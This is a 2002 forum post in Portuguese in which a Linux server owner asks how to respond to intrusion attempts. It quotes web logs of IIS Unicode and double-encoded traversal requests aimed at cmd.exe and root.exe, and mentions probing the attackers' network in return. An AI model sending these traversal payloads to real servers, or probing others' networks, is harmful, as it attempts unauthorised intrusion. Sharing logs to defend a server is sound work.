Quais a atitudes a ser tomadas quando se sofre tentativas de invasão ??
No meu caso eu venho sofrendo ataques de "2 redes" porem pelo que notei os as duas "redes" de mesmo IP´s (aparentemente uma pessoa de cada rede).
Meu server esta´ okey ja´ o sniffei e testei com meus amigos sua segurança.
As pessoas que atacam neste momento não me preocupam por que pelas tentativas delas elas não sabem definir nem que sistema é o server vejam alguns logs aqui.
--
200.242.49.4 - - [01/Jul/2002:21:22:11 -0300] "GET /scripts/..%c1%1c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 307
200.242.49.4 - - [01/Jul/2002:21:22:13 -0300] "GET /scripts/..%c0%2f../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 307
200.242.49.4 - - [01/Jul/2002:21:22:16 -0300] "GET /scripts/..%c0%af../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 307
200.242.49.4 - - [01/Jul/2002:21:22:16 -0300] "GET /scripts/..%c1%9c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 307
200.242.49.4 - - [01/Jul/2002:21:22:19 -0300] "GET /scripts/..%%35%63../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 400 291
200.242.49.4 - - [01/Jul/2002:21:22:22 -0300] "GET /scripts/..%%35c../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 400 291
200.242.49.4 - - [01/Jul/2002:21:22:25 -0300] "GET /scripts/..%25%35%63../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.242.49.4 - - [01/Jul/2002:21:22:26 -0300] "GET /scripts/..%252f../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 308
----
OBS: tendo em vista que uso Linux isso nao causa efeito nenhum em mim :)
----
200.37.91.60 - - [07/Jul/2002:19:43:47 -0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286
200.37.91.60 - - [07/Jul/2002:19:43:49 -0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284
200.37.91.60 - - [07/Jul/2002:19:43:51 -0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
200.37.91.60 - - [07/Jul/2002:19:44:04 -0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
200.37.91.60 - - [07/Jul/2002:19:44:10 -0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.37.91.60 - - [07/Jul/2002:19:44:17 -0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
200.37.91.60 - - [07/Jul/2002:19:44:20 -0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
------------------------------------------
Bem não sei se fiz correto, pois sou novo nisso, mas chequei(snifei) a rede dele e notei que O QUE ELE QUERIAM ENCONTRAR EM MIM ESTA NELE O PROBLEMA, ou seja´ sua rede ambas estao nada bem ::P
Bem, meu objeto é, como devo agir principalemente para uma atitude futura em um caso mais sério, me recomendaram notificar as redes mandando um email de como root do meu server para o adm do server de ambas redes.
Agradeço dede já.
<IMG SRC="images/forum/smilies/icon_confused.gif"> :)